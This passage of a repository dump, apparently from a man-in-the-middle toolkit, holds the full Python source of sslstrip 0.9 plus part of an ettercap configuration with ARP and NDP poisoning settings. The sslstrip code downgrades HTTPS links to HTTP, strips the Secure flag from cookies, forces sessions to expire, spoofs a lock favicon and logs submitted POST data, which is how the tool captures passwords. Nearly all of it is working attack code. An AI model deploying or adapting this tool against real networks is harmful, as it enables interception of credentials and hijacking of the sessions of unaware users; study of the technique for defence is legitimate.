"Usage: sslstrip \n" 41 | print "Options:" 42 | print "-w , --write= Specify file to log to (optional)." 43 | print "-p , --post Log only SSL POSTs. (default)" 44 | print "-s , --ssl Log all SSL traffic to and from server." 45 | print "-a , --all Log all SSL and HTTP traffic to and from server." 46 | print "-l , --listen= Port to listen on (default 10000)." 47 | print "-f , --favicon Substitute a lock favicon on secure requests." 48 | print "-k , --killsessions Kill sessions in progress." 49 | print "-h Print this help message." 50 | print "" 51 | 52 | def parseOptions(argv): 53 | logFile = 'sslstrip.log' 54 | logLevel = logging.WARNING 55 | listenPort = 10000 56 | spoofFavicon = False 57 | killSessions = False 58 | 59 | try: 60 | opts, args = getopt.getopt(argv, "hw:l:psafk", 61 | ["help", "write=", "post", "ssl", "all", "listen=", 62 | "favicon", "killsessions"]) 63 | 64 | for opt, arg in opts: 65 | if opt in ("-h", "--help"): 66 | usage() 67 | sys.exit() 68 | elif opt in ("-w", "--write"): 69 | logFile = arg 70 | elif opt in ("-p", "--post"): 71 | logLevel = logging.WARNING 72 | elif opt in ("-s", "--ssl"): 73 | logLevel = logging.INFO 74 | elif opt in ("-a", "--all"): 75 | logLevel = logging.DEBUG 76 | elif opt in ("-l", "--listen"): 77 | listenPort = arg 78 | elif opt in ("-f", "--favicon"): 79 | spoofFavicon = True 80 | elif opt in ("-k", "--killsessions"): 81 | killSessions = True 82 | 83 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 84 | 85 | except getopt.GetoptError: 86 | usage() 87 | sys.exit(2) 88 | 89 | def main(argv): 90 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 91 | 92 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 93 | filename=logFile, filemode='w') 94 | 95 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 96 | CookieCleaner.getInstance().setEnabled(killSessions) 97 | 98 | strippingFactory = http.HTTPFactory(timeout=10) 99 | strippingFactory.protocol = StrippingProxy 100 | 101 | reactor.listenTCP(int(listenPort), strippingFactory) 102 | 103 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 104 | 105 | reactor.run() 106 | 107 | if __name__ == '__main__': 108 | main(sys.argv[1:]) 109 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'if-modified-since' in headers: 60 | del headers['if-modified-since'] 61 | 62 | if 'cache-control' in headers: 63 | del headers['cache-control'] 64 | 65 | return headers 66 | 67 | def getPathFromUri(self): 68 | if (self.uri.find("http://") == 0): 69 | index = self.uri.find('/', 7) 70 | return self.uri[index:] 71 | 72 | return self.uri 73 | 74 | def getPathToLockIcon(self): 75 | if os.path.exists("lock.ico"): return "lock.ico" 76 | 77 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 78 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 79 | 80 | if os.path.exists(scriptPath): return scriptPath 81 | 82 | logging.warning("Error: Could not find lock.ico") 83 | return "lock.ico" 84 | 85 | def handleHostResolvedSuccess(self, address): 86 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) 87 | host = self.getHeader("host") 88 | headers = self.cleanHeaders() 89 | client = self.getClientIP() 90 | path = self.getPathFromUri() 91 | 92 | self.content.seek(0,0) 93 | postData = self.content.read() 94 | url = 'http://' + host + path 95 | 96 | self.dnsCache.cacheResolution(host, address) 97 | 98 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 99 | logging.debug("Sending expired cookies...") 100 | self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 101 | host, headers, path)) 102 | elif (self.urlMonitor.isSecureFavicon(client, path)): 103 | logging.debug("Sending spoofed favicon response...") 104 | self.sendSpoofedFaviconResponse() 105 | elif (self.urlMonitor.isSecureLink(client, url)): 106 | logging.debug("Sending request via SSL...") 107 | self.proxyViaSSL(address, self.method, path, postData, headers, 108 | self.urlMonitor.getSecurePort(client, url)) 109 | else: 110 | logging.debug("Sending request via HTTP...") 111 | self.proxyViaHTTP(address, self.method, path, postData, headers) 112 | 113 | def handleHostResolvedError(self, error): 114 | logging.warning("Host resolution error: " + str(error)) 115 | self.finish() 116 | 117 | def resolveHost(self, host): 118 | address = self.dnsCache.getCachedAddress(host) 119 | 120 | if address != None: 121 | logging.debug("Host cached.") 122 | return defer.succeed(address) 123 | else: 124 | logging.debug("Host not cached.") 125 | return reactor.resolve(host) 126 | 127 | def process(self): 128 | logging.debug("Resolving host: %s" % (self.getHeader('host'))) 129 | host = self.getHeader('host') 130 | deferred = self.resolveHost(host) 131 | 132 | deferred.addCallback(self.handleHostResolvedSuccess) 133 | deferred.addErrback(self.handleHostResolvedError) 134 | 135 | def proxyViaHTTP(self, host, method, path, postData, headers): 136 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 137 | connectionFactory.protocol = ServerConnection 138 | self.reactor.connectTCP(host, 80, connectionFactory) 139 | 140 | def proxyViaSSL(self, host, method, path, postData, headers, port): 141 | clientContextFactory = ssl.ClientContextFactory() 142 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 143 | connectionFactory.protocol = SSLServerConnection 144 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 145 | 146 | def sendExpiredCookies(self, host, path, expireHeaders): 147 | self.setResponseCode(302, "Moved") 148 | self.setHeader("Connection", "close") 149 | self.setHeader("Location", "http://" + host + path) 150 | 151 | for header in expireHeaders: 152 | self.setHeader("Set-Cookie", header) 153 | 154 | self.finish() 155 | 156 | def sendSpoofedFaviconResponse(self): 157 | icoFile = open(self.getPathToLockIcon()) 158 | 159 | self.setResponseCode(200, "OK") 160 | self.setHeader("Content-type", "image/x-icon") 161 | self.write(icoFile.read()) 162 | 163 | icoFile.close() 164 | self.finish() 165 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | import string 21 | 22 | class CookieCleaner: 23 | '''This class cleans cookies we haven't seen before. The basic idea is to 24 | kill sessions, which isn't entirely straight-forward. Since we want this to 25 | be generalized, there's no way for us to know exactly what cookie we're trying 26 | to kill, which also means we don't know what domain or path it has been set for. 27 | 28 | The rule with cookies is that specific overrides general. So cookies that are 29 | set for mail.foo.com override cookies with the same name that are set for .foo.com, 30 | just as cookies that are set for foo.com/mail override cookies with the same name 31 | that are set for foo.com/ 32 | 33 | The best we can do is guess, so we just try to cover our bases by expiring cookies 34 | in a few different ways. The most obvious thing to do is look for individual cookies 35 | and nail the ones we haven't seen coming from the server, but the problem is that cookies are often 36 | set by Javascript instead of a Set-Cookie header, and if we block those the site 37 | will think cookies are disabled in the browser. So we do the expirations and whitlisting 38 | based on client,server tuples. The first time a client hits a server, we kill whatever 39 | cookies we see then. After that, we just let them through. Not perfect, but pretty effective. 40 | 41 | ''' 42 | 43 | _instance = None 44 | 45 | def getInstance(): 46 | if CookieCleaner._instance == None: 47 | CookieCleaner._instance = CookieCleaner() 48 | 49 | return CookieCleaner._instance 50 | 51 | getInstance = staticmethod(getInstance) 52 | 53 | def __init__(self): 54 | self.cleanedCookies = set(); 55 | self.enabled = False 56 | 57 | def setEnabled(self, enabled): 58 | self.enabled = enabled 59 | 60 | def isClean(self, method, client, host, headers): 61 | if method == "POST": return True 62 | if not self.enabled: return True 63 | if not self.hasCookies(headers): return True 64 | 65 | return (client, self.getDomainFor(host)) in self.cleanedCookies 66 | 67 | def getExpireHeaders(self, method, client, host, headers, path): 68 | domain = self.getDomainFor(host) 69 | self.cleanedCookies.add((client, domain)) 70 | 71 | expireHeaders = [] 72 | 73 | for cookie in headers['cookie'].split(";"): 74 | cookie = cookie.split("=")[0].strip() 75 | expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) 76 | expireHeaders.extend(expireHeadersForCookie) 77 | 78 | return expireHeaders 79 | 80 | def hasCookies(self, headers): 81 | return 'cookie' in headers 82 | 83 | def getDomainFor(self, host): 84 | hostParts = host.split(".") 85 | return "." + hostParts[-2] + "." + hostParts[-1] 86 | 87 | def getExpireCookieStringFor(self, cookie, host, domain, path): 88 | pathList = path.split("/") 89 | expireStrings = list() 90 | 91 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + 92 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 93 | 94 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + 95 | ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 96 | 97 | if len(pathList) > 2: 98 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 99 | domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 100 | 101 | expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + 102 | host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") 103 | 104 | return expireStrings 105 | 106 | 107 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/DnsCache.py: -------------------------------------------------------------------------------- 1 | 2 | class DnsCache: 3 | 4 | ''' 5 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. 6 | ''' 7 | 8 | _instance = None 9 | 10 | def __init__(self): 11 | self.cache = {} 12 | 13 | def cacheResolution(self, host, address): 14 | self.cache[host] = address 15 | 16 | def getCachedAddress(self, host): 17 | if host in self.cache: 18 | return self.cache[host] 19 | 20 | return None 21 | 22 | def getInstance(): 23 | if DnsCache._instance == None: 24 | DnsCache._instance = DnsCache() 25 | 26 | return DnsCache._instance 27 | 28 | getInstance = staticmethod(getInstance) 29 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/SSLServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string 20 | 21 | from ServerConnection import ServerConnection 22 | 23 | class SSLServerConnection(ServerConnection): 24 | 25 | ''' 26 | For SSL connections to a server, we need to do some additional stripping. First we need 27 | to make note of any relative links, as the server will be expecting those to be requested 28 | via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. 29 | ''' 30 | 31 | cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) 32 | cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) 33 | iconExpression = re.compile(r"", re.IGNORECASE) 34 | linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) 35 | headExpression = re.compile(r"", re.IGNORECASE) 36 | 37 | def __init__(self, command, uri, postData, headers, client): 38 | ServerConnection.__init__(self, command, uri, postData, headers, client) 39 | 40 | def getLogLevel(self): 41 | return logging.INFO 42 | 43 | def getPostPrefix(self): 44 | return "SECURE POST" 45 | 46 | def handleHeader(self, key, value): 47 | if (key.lower() == 'set-cookie'): 48 | value = SSLServerConnection.cookieExpression.sub("\g<1>", value) 49 | 50 | ServerConnection.handleHeader(self, key, value) 51 | 52 | def stripFileFromPath(self, path): 53 | (strippedPath, lastSlash, file) = path.rpartition('/') 54 | return strippedPath 55 | 56 | def buildAbsoluteLink(self, link): 57 | absoluteLink = "" 58 | 59 | if ((not link.startswith('http')) and (not link.startswith('/'))): 60 | absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link 61 | 62 | logging.debug("Found path-relative link in secure transmission: " + link) 63 | logging.debug("New Absolute path-relative link: " + absoluteLink) 64 | elif not link.startswith('http'): 65 | absoluteLink = "http://"+self.headers['host']+link 66 | 67 | logging.debug("Found relative link in secure transmission: " + link) 68 | logging.debug("New Absolute link: " + absoluteLink) 69 | 70 | if not absoluteLink == "": 71 | absoluteLink = absoluteLink.replace('&', '&') 72 | self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); 73 | 74 | def replaceCssLinks(self, data): 75 | iterator = re.finditer(SSLServerConnection.cssExpression, data) 76 | 77 | for match in iterator: 78 | self.buildAbsoluteLink(match.group(1)) 79 | 80 | return data 81 | 82 | def replaceFavicon(self, data): 83 | match = re.search(SSLServerConnection.iconExpression, data) 84 | 85 | if (match != None): 86 | data = re.sub(SSLServerConnection.iconExpression, 87 | "", data) 88 | else: 89 | data = re.sub(SSLServerConnection.headExpression, 90 | "", data) 91 | 92 | return data 93 | 94 | def replaceSecureLinks(self, data): 95 | data = ServerConnection.replaceSecureLinks(self, data) 96 | data = self.replaceCssLinks(data) 97 | 98 | if (self.urlMonitor.isFaviconSpoofing()): 99 | data = self.replaceFavicon(data) 100 | 101 | iterator = re.finditer(SSLServerConnection.linkExpression, data) 102 | 103 | for match in iterator: 104 | self.buildAbsoluteLink(match.group(10)) 105 | 106 | return data 107 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/ServerConnection.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging, re, string, random, zlib, gzip, StringIO 20 | 21 | from twisted.web.http import HTTPClient 22 | from URLMonitor import URLMonitor 23 | 24 | class ServerConnection(HTTPClient): 25 | 26 | ''' The server connection is where we do the bulk of the stripping. Everything that 27 | comes back is examined. The headers we dont like are removed, and the links are stripped 28 | from HTTPS to HTTP. 29 | ''' 30 | 31 | urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) 32 | urlType = re.compile(r"https://", re.IGNORECASE) 33 | urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) 34 | 35 | def __init__(self, command, uri, postData, headers, client): 36 | self.command = command 37 | self.uri = uri 38 | self.postData = postData 39 | self.headers = headers 40 | self.client = client 41 | self.urlMonitor = URLMonitor.getInstance() 42 | self.isImageRequest = False 43 | self.isCompressed = False 44 | self.contentLength = None 45 | self.shutdownComplete = False 46 | 47 | def getLogLevel(self): 48 | return logging.DEBUG 49 | 50 | def getPostPrefix(self): 51 | return "POST" 52 | 53 | def sendRequest(self): 54 | logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri)) 55 | self.sendCommand(self.command, self.uri) 56 | 57 | def sendHeaders(self): 58 | for header, value in self.headers.items(): 59 | logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value)) 60 | self.sendHeader(header, value) 61 | 62 | self.endHeaders() 63 | 64 | def sendPostData(self): 65 | logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData)) 66 | self.transport.write(self.postData) 67 | 68 | def connectionMade(self): 69 | logging.log(self.getLogLevel(), "HTTP connection made.") 70 | self.sendRequest() 71 | self.sendHeaders() 72 | 73 | if (self.command == 'POST'): 74 | self.sendPostData() 75 | 76 | def handleStatus(self, version, code, message): 77 | logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message)) 78 | self.client.setResponseCode(int(code), message) 79 | 80 | def handleHeader(self, key, value): 81 | logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value)) 82 | 83 | if (key.lower() == 'location'): 84 | value = self.replaceSecureLinks(value) 85 | 86 | if (key.lower() == 'content-type'): 87 | if (value.find('image') != -1): 88 | self.isImageRequest = True 89 | logging.debug("Response is image content, not scanning...") 90 | 91 | if (key.lower() == 'content-encoding'): 92 | if (value.find('gzip') != -1): 93 | logging.debug("Response is compressed...") 94 | self.isCompressed = True 95 | elif (key.lower() == 'content-length'): 96 | self.contentLength = value 97 | elif (key.lower() == 'set-cookie'): 98 | self.client.responseHeaders.addRawHeader(key, value) 99 | else: 100 | self.client.setHeader(key, value) 101 | 102 | def handleEndHeaders(self): 103 | if (self.isImageRequest and self.contentLength != None): 104 | self.client.setHeader("Content-Length", self.contentLength) 105 | 106 | if self.length == 0: 107 | self.shutdown() 108 | 109 | def handleResponsePart(self, data): 110 | if (self.isImageRequest): 111 | self.client.write(data) 112 | else: 113 | HTTPClient.handleResponsePart(self, data) 114 | 115 | def handleResponseEnd(self): 116 | if (self.isImageRequest): 117 | self.shutdown() 118 | else: 119 | HTTPClient.handleResponseEnd(self) 120 | 121 | def handleResponse(self, data): 122 | if (self.isCompressed): 123 | logging.debug("Decompressing content...") 124 | data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() 125 | 126 | logging.log(self.getLogLevel(), "Read from server:\n" + data) 127 | 128 | data = self.replaceSecureLinks(data) 129 | 130 | if (self.contentLength != None): 131 | self.client.setHeader('Content-Length', len(data)) 132 | 133 | self.client.write(data) 134 | self.shutdown() 135 | 136 | def replaceSecureLinks(self, data): 137 | iterator = re.finditer(ServerConnection.urlExpression, data) 138 | 139 | for match in iterator: 140 | url = match.group() 141 | 142 | logging.debug("Found secure reference: " + url) 143 | 144 | url = url.replace('https://', 'http://', 1) 145 | url = url.replace('&', '&') 146 | self.urlMonitor.addSecureLink(self.client.getClientIP(), url) 147 | 148 | data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) 149 | return re.sub(ServerConnection.urlType, 'http://', data) 150 | 151 | def shutdown(self): 152 | if not self.shutdownComplete: 153 | self.shutdownComplete = True 154 | self.client.finish() 155 | self.transport.loseConnection() 156 | 157 | 158 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/ServerConnectionFactory.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import logging 20 | from twisted.internet.protocol import ClientFactory 21 | 22 | class ServerConnectionFactory(ClientFactory): 23 | 24 | def __init__(self, command, uri, postData, headers, client): 25 | self.command = command 26 | self.uri = uri 27 | self.postData = postData 28 | self.headers = headers 29 | self.client = client 30 | 31 | def buildProtocol(self, addr): 32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) 33 | 34 | def clientConnectionFailed(self, connector, reason): 35 | logging.debug("Server connection failed.") 36 | 37 | destination = connector.getDestination() 38 | 39 | if (destination.port != 443): 40 | logging.debug("Retrying via SSL") 41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) 42 | else: 43 | self.client.finish() 44 | 45 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/StrippingProxy.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | from twisted.web.http import HTTPChannel 20 | from ClientRequest import ClientRequest 21 | 22 | class StrippingProxy(HTTPChannel): 23 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things. 24 | This is the basic proxy server class, where we get callbacks for GET and POST methods. 25 | We then proxy these out using HTTP or HTTPS depending on what information we have about 26 | the (connection, client_address) tuple in our cache. 27 | ''' 28 | 29 | requestFactory = ClientRequest 30 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/URLMonitor.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import re 20 | 21 | class URLMonitor: 22 | 23 | ''' 24 | The URL monitor maintains a set of (client, url) tuples that correspond to requests which the 25 | server is expecting over SSL. It also keeps track of secure favicon urls. 26 | ''' 27 | 28 | # Start the arms race, and end up here... 29 | javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] 30 | _instance = None 31 | 32 | def __init__(self): 33 | self.strippedURLs = set() 34 | self.strippedURLPorts = {} 35 | self.faviconReplacement = False 36 | 37 | def isSecureLink(self, client, url): 38 | for expression in URLMonitor.javascriptTrickery: 39 | if (re.match(expression, url)): 40 | return True 41 | 42 | return (client,url) in self.strippedURLs 43 | 44 | def getSecurePort(self, client, url): 45 | if (client,url) in self.strippedURLs: 46 | return self.strippedURLPorts[(client,url)] 47 | else: 48 | return 443 49 | 50 | def addSecureLink(self, client, url): 51 | methodIndex = url.find("//") + 2 52 | method = url[0:methodIndex] 53 | 54 | pathIndex = url.find("/", methodIndex) 55 | host = url[methodIndex:pathIndex] 56 | path = url[pathIndex:] 57 | 58 | port = 443 59 | portIndex = host.find(":") 60 | 61 | if (portIndex != -1): 62 | host = host[0:portIndex] 63 | port = host[portIndex+1:] 64 | if len(port) == 0: 65 | port = 443 66 | 67 | url = method + host + path 68 | 69 | self.strippedURLs.add((client, url)) 70 | self.strippedURLPorts[(client, url)] = int(port) 71 | 72 | def setFaviconSpoofing(self, faviconSpoofing): 73 | self.faviconSpoofing = faviconSpoofing 74 | 75 | def isFaviconSpoofing(self): 76 | return self.faviconSpoofing 77 | 78 | def isSecureFavicon(self, client, url): 79 | return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) 80 | 81 | def getInstance(): 82 | if URLMonitor._instance == None: 83 | URLMonitor._instance = URLMonitor() 84 | 85 | return URLMonitor._instance 86 | 87 | getInstance = staticmethod(getInstance) 88 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/sslstrip-0.9/sslstrip/__init__.py -------------------------------------------------------------------------------- /bin/etter.conf: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # ettercap -- etter.conf -- configuration file # 4 | # # 5 | # Copyright (C) ALoR & NaGA # 6 | # # 7 | # This program is free software; you can redistribute it and/or modify # 8 | # it under the terms of the GNU General Public License as published by # 9 | # the Free Software Foundation; either version 2 of the License, or # 10 | # (at your option) any later version. # 11 | # # 12 | # # 13 | # [ DEFAULT privs:65534] # 14 | ############################################################################ 15 | 16 | [privs] 17 | ec_uid = 0 # nobody is the default 18 | ec_gid = 0 # nobody is the default 19 | 20 | [mitm] 21 | arp_storm_delay = 10 # milliseconds 22 | arp_poison_smart = 0 # boolean 23 | arp_poison_warm_up = 1 # seconds 24 | arp_poison_delay = 10 # seconds 25 | arp_poison_icmp = 1 # boolean 26 | arp_poison_reply = 1 # boolean 27 | arp_poison_request = 0 # boolean 28 | arp_poison_equal_mac = 1 # boolean 29 | dhcp_lease_time = 1800 # seconds 30 | port_steal_delay = 10 # seconds 31 | port_steal_send_delay = 2000 # microseconds 32 | ndp_poison_warm_up = 1 # seconds 33 | ndp_poison_delay = 5 # seconds 34 | ndp_poison_send_delay = 1500 # microseconds 35 | ndp_poison_icmp = 1 # boolean 36 | ndp_poison_equal_mac = 1 # boolean 37 | icmp6_probe_delay = 3 # seconds 38 | 39 | [connections] 40 | connection_timeout = 300 # seconds 41 | connection_idle = 5 # seconds 42 | connection_buffer = 10000 # bytes 43 | connect_timeout = 5 # seconds 44 | 45 | [stats] 46 | sampling_rate = 50 # number of packets 47 | 48 | [misc] 49 | close_on_eof = 1 # boolean value 50 | store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote 51 | aggressive_dissectors = 1 # boolean value 52 | skip_forwarded_pcks = 1 # boolean value 53 | checksum_check = 0 # boolean value 54 | submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints) 55 | checksum_warning = 0 # boolean value (valid only if checksum_check is 1) 56 | sniffing_at_startup = 1 # boolean value 57 | 58 | ############################################################################ 59 | # 60 | # You can specify what DISSECTORS are to be enabled or not... 61 | # 62 | # e.g.: ftp = 21 enabled on port 21 (tcp is implicit) 63 | # ftp = 2345 enabled on non standard port 64 | # ftp = 21,453 enabled on port 21 and 453 65 | # ftp = 0 disabled 66 | # 67 | # NOTE: some dissectors have multiple default ports, if you specify a new 68 | # one, all the default ports will be overwritten 69 | # 70 | # 71 | 72 | #dissector default port 73 | 74 | [dissectors] 75 | ftp = 21 # tcp 21 76 | ssh = 22 # tcp 22 77 | telnet = 23 # tcp 23 78 | smtp = 25 # tcp 25 79 | dns = 53 # udp 53 80 | dhcp = 67 # udp 68 81 | http = 80 # tcp 80 82 | ospf = 89 # ip 89 (IPPROTO 0x59) 83 | pop3 = 110 # tcp 110 84 | #portmap = 111 # 